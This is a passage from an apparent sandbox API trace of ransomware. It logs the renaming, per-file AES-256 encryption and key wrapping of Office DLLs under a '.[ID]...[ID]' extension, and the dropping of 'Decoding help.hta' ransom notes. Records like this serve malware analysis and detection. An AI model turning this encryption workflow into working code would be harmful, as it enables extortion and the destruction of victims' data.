Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" [0045.973] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0045.973] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0045.974] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\equation\\1033\\eeintl.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5dc [0045.974] CreateFileMappingA (hFile=0x5dc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x42c [0045.974] CryptAcquireContextA (in: phProv=0x20f5fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x20f5fcec*=0x3448500) returned 1 [0045.975] CryptGenKey (in: hProv=0x3448500, Algid=0x6610, dwFlags=0x1, phKey=0x20f5fce8 | out: phKey=0x20f5fce8*=0x671870) returned 1 [0045.975] CryptExportKey (in: hKey=0x671870, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x20f5fbe4, pdwDataLen=0x20f5fce4 | out: pbData=0x20f5fbe4*, pdwDataLen=0x20f5fce4*=0x2c) returned 1 [0045.975] MapViewOfFile (hFileMappingObject=0x42c, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xfa60) returned 0x3a20000 [0046.118] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x20f5fbe4*, pdwDataLen=0x20f5fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x20f5fbe4*, pdwDataLen=0x20f5fcf8*=0x100) returned 1 [0046.118] CryptEncrypt (in: hKey=0x671870, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3a20000, pdwDataLen=0x20f5fce4*=0xfa60, dwBufLen=0xfa60 | out: pbData=0x3a20000*, pdwDataLen=0x20f5fce4*=0xfa60) returned 1 [0046.208] UnmapViewOfFile (lpBaseAddress=0x3a20000) returned 1 [0046.210] CloseHandle (hObject=0x42c) returned 1 [0046.210] CryptDestroyKey (hKey=0x671870) returned 1 [0046.210] CryptReleaseContext (hProv=0x3448500, dwFlags=0x0) returned 1 [0046.210] SetFilePointerEx (in: hFile=0x5dc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.210] WriteFile (in: hFile=0x5dc, lpBuffer=0x20f5fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x20f5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x20f5fbe4*, lpNumberOfBytesWritten=0x20f5fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.211] WriteFile (in: hFile=0x5dc, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x20f5fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x20f5fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.211] CloseHandle (hObject=0x5dc) returned 1 [0046.212] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\EQUATION\\1033\\EEINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.212] FindNextFileW (in: hFindFile=0x6718f0, lpFindFileData=0x20f5fd30 | out: lpFindFileData=0x20f5fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x723f8e00, ftCreationTime.dwHighDateTime=0x1c2e156, ftLastAccessTime.dwLowDateTime=0xeed38550, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x723f8e00, ftLastWriteTime.dwHighDateTime=0x1c2e156, nFileSizeHigh=0x0, nFileSizeLow=0xfa60, dwReserved0=0x0, dwReserved1=0x0, cFileName="EEINTL.DLL", cAlternateFileName="")) returned 0 [0046.212] FindClose (in: hFindFile=0x6718f0 | out: hFindFile=0x6718f0) returned 1 Thread: id = 494 os_tid = 0x9a0 [0046.081] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*", lpFindFileData=0x2109fd30 | out: lpFindFileData=0x2109fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5e29f0 [0046.082] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0046.082] FindNextFileW (in: hFindFile=0x5e29f0, lpFindFileData=0x2109fd30 | out: lpFindFileData=0x2109fd30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xee282250, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xc24d0020, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0xc24d0020, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0046.082] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0046.082] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0046.082] FindNextFileW (in: hFindFile=0x5e29f0, lpFindFileData=0x2109fd30 | out: lpFindFileData=0x2109fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x81925f00, ftCreationTime.dwHighDateTime=0x1caca23, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x81925f00, ftLastWriteTime.dwHighDateTime=0x1caca23, nFileSizeHigh=0x0, nFileSizeLow=0x305a8, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEINTL.DLL", cAlternateFileName="")) returned 1 [0046.082] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" [0046.082] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned 68 [0046.082] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta" [0046.082] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\decoding help.hta")) returned 0xffffffff [0046.082] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0046.086] WriteFile (in: hFile=0x6f0, lpBuffer=0x403006*, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x2109fcf8, lpOverlapped=0x0 | out: lpBuffer=0x403006*, lpNumberOfBytesWritten=0x2109fcf8*=0x78e, lpOverlapped=0x0) returned 1 [0046.087] CloseHandle (hObject=0x6f0) returned 1 [0046.087] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta", dwFileAttributes=0x1) returned 1 [0046.088] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACEINTL.DLL") returned 1 [0046.088] lstrlenW (lpString="ACEINTL.DLL") returned 11 [0046.088] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" [0046.088] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned 68 [0046.088] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\", lpString2="ACEINTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" [0046.088] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" [0046.088] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0046.088] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.089] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceintl.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0046.089] CreateFileMappingA (hFile=0x6f0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6c8 [0046.089] CryptAcquireContextA (in: phProv=0x2109fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2109fcec*=0x3449e80) returned 1 [0046.090] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x2109fce8 | out: phKey=0x2109fce8*=0x6719b0) returned 1 [0046.090] CryptExportKey (in: hKey=0x6719b0, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2109fbe4, pdwDataLen=0x2109fce4 | out: pbData=0x2109fbe4*, pdwDataLen=0x2109fce4*=0x2c) returned 1 [0046.090] MapViewOfFile (hFileMappingObject=0x6c8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x305a0) returned 0x6750000 [0046.173] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2109fbe4*, pdwDataLen=0x2109fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2109fbe4*, pdwDataLen=0x2109fcf8*=0x100) returned 1 [0046.173] CryptEncrypt (in: hKey=0x6719b0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x6750000, pdwDataLen=0x2109fce4*=0x305a0, dwBufLen=0x305a0 | out: pbData=0x6750000*, pdwDataLen=0x2109fce4*=0x305a0) returned 1 [0046.421] UnmapViewOfFile (lpBaseAddress=0x6750000) returned 1 [0046.425] CloseHandle (hObject=0x6c8) returned 1 [0046.425] CryptDestroyKey (hKey=0x6719b0) returned 1 [0046.425] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0046.425] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.425] WriteFile (in: hFile=0x6f0, lpBuffer=0x2109fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2109fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2109fbe4*, lpNumberOfBytesWritten=0x2109fcf8*=0x100, lpOverlapped=0x0) returned 1 [0046.426] WriteFile (in: hFile=0x6f0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2109fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2109fcf8*=0x500, lpOverlapped=0x0) returned 1 [0046.426] CloseHandle (hObject=0x6f0) returned 1 [0046.428] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEINTL.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0046.428] FindNextFileW (in: hFindFile=0x5e29f0, lpFindFileData=0x2109fd30 | out: lpFindFileData=0x2109fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0xcdb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACEODBCI.DLL", cAlternateFileName="")) returned 1 [0046.428] lstrcpyW (in: lpString1=0x10970868, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" [0046.428] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned 68 [0046.428] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta" [0046.428] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\decoding help.hta")) returned 0x1 [0046.428] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACEODBCI.DLL") returned 1 [0046.429] lstrlenW (lpString="ACEODBCI.DLL") returned 12 [0046.429] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" [0046.429] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned 68 [0046.429] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\", lpString2="ACEODBCI.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" [0046.429] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" [0046.429] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0046.429] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0046.430] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\aceodbci.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x6f0 [0046.430] CreateFileMappingA (hFile=0x6f0, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x6c8 [0046.430] CryptAcquireContextA (in: phProv=0x2109fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2109fcec*=0x3449e80) returned 1 [0046.431] CryptGenKey (in: hProv=0x3449e80, Algid=0x6610, dwFlags=0x1, phKey=0x2109fce8 | out: phKey=0x2109fce8*=0x671c30) returned 1 [0046.431] CryptExportKey (in: hKey=0x671c30, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2109fbe4, pdwDataLen=0x2109fce4 | out: pbData=0x2109fbe4*, pdwDataLen=0x2109fce4*=0x2c) returned 1 [0046.431] MapViewOfFile (hFileMappingObject=0x6c8, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0xcda0) returned 0x2fb0000 [0046.467] CryptEncrypt (in: hKey=0x5a5130, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2109fbe4*, pdwDataLen=0x2109fcf8*=0x40, dwBufLen=0x100 | out: pbData=0x2109fbe4*, pdwDataLen=0x2109fcf8*=0x100) returned 1 [0046.468] CryptEncrypt (in: hKey=0x671c30, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2fb0000, pdwDataLen=0x2109fce4*=0xcda0, dwBufLen=0xcda0 | out: pbData=0x2fb0000*, pdwDataLen=0x2109fce4*=0xcda0) returned 1 [0046.522] UnmapViewOfFile (lpBaseAddress=0x2fb0000) returned 1 [0046.524] CloseHandle (hObject=0x6c8) returned 1 [0046.524] CryptDestroyKey (hKey=0x671c30) returned 1 [0046.524] CryptReleaseContext (hProv=0x3449e80, dwFlags=0x0) returned 1 [0046.525] SetFilePointerEx (in: hFile=0x6f0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0046.525] WriteFile (in: hFile=0x6f0, lpBuffer=0x2109fbe4*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2109fcf8, lpOverlapped=0x0 | out: lpBuffer=0x2109fbe4*, lpNumberOfBytesWritten=0x2109fcf8*=0x100, lpOverlapped=0x0) returned 1 [0049.454] WriteFile (in: hFile=0x6f0, lpBuffer=0x4040f0*, nNumberOfBytesToWrite=0x500, lpNumberOfBytesWritten=0x2109fcf8, lpOverlapped=0x0 | out: lpBuffer=0x4040f0*, lpNumberOfBytesWritten=0x2109fcf8*=0x500, lpOverlapped=0x0) returned 1 [0050.508] CloseHandle (hObject=0x6f0) returned 1 [0050.510] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACEODBCI.DLL.[ID]g9uZrLhJaygpwRm1[ID]", dwFileAttributes=0x1) returned 1 [0053.660] FindNextFileW (in: hFindFile=0x5e29f0, lpFindFileData=0x2109fd30 | out: lpFindFileData=0x2109fd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77357e00, ftCreationTime.dwHighDateTime=0x1cac9ad, ftLastAccessTime.dwLowDateTime=0xee2a83b0, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0x77357e00, ftLastWriteTime.dwHighDateTime=0x1cac9ad, nFileSizeHigh=0x0, nFileSizeLow=0x51d0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ACERECR.DLL", cAlternateFileName="")) returned 1 [0053.660] lstrcpyW (in: lpString1=0x2a740278, lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" [0053.660] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned 68 [0053.660] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta" [0053.660] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\Decoding help.hta" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\decoding help.hta")) returned 0x1 [0053.660] lstrcmpiW (lpString1="Decoding help.hta", lpString2="ACERECR.DLL") returned 1 [0053.660] lstrlenW (lpString="ACERECR.DLL") returned 11 [0053.660] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*" [0053.660] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\*.*") returned 68 [0053.660] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\", lpString2="ACERECR.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" [0053.660] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" [0053.661] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" [0053.661] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.[id]g9uzrlhjaygpwrm1[id]")) returned 1 [0057.577] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\1033\\ACERECR.DLL.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\1033\\acerecr.dll.[id]g9uzrlhjaygpwrm1[id]"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x99c [0057.577] CreateFileMappingA (hFile=0x99c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x9a0 [0057.577] CryptAcquireContextA (in: phProv=0x2109fcec, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x2109fcec*=0x3448ad8) returned 1 [0060.168] CryptGenKey (in: hProv=0x3448ad8, Algid=0x6610, dwFlags=0x1, phKey=0x2109fce8 | out: phKey=0x2109fce8*=0x5d8150) returned 1 [0060.168] CryptExportKey (in: hKey=0x5d8150, hExpKey=0x0, dwBlobType=0x8, dwFlags=0x0, pbData=0x2109fbe4, pdwDataLen=0x2109fce4 | out: pbData=0x2109fbe4*, pdwDataLen=0x2109fce4*=0x2c) returned 1 [0060.168] MapViewOfFile (hFileMappingObject=0x9a0, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x51c0) returned 0x560000 Thread: id = 495 os_tid = 0x330 [0046.168] FindFirstFileW (in: 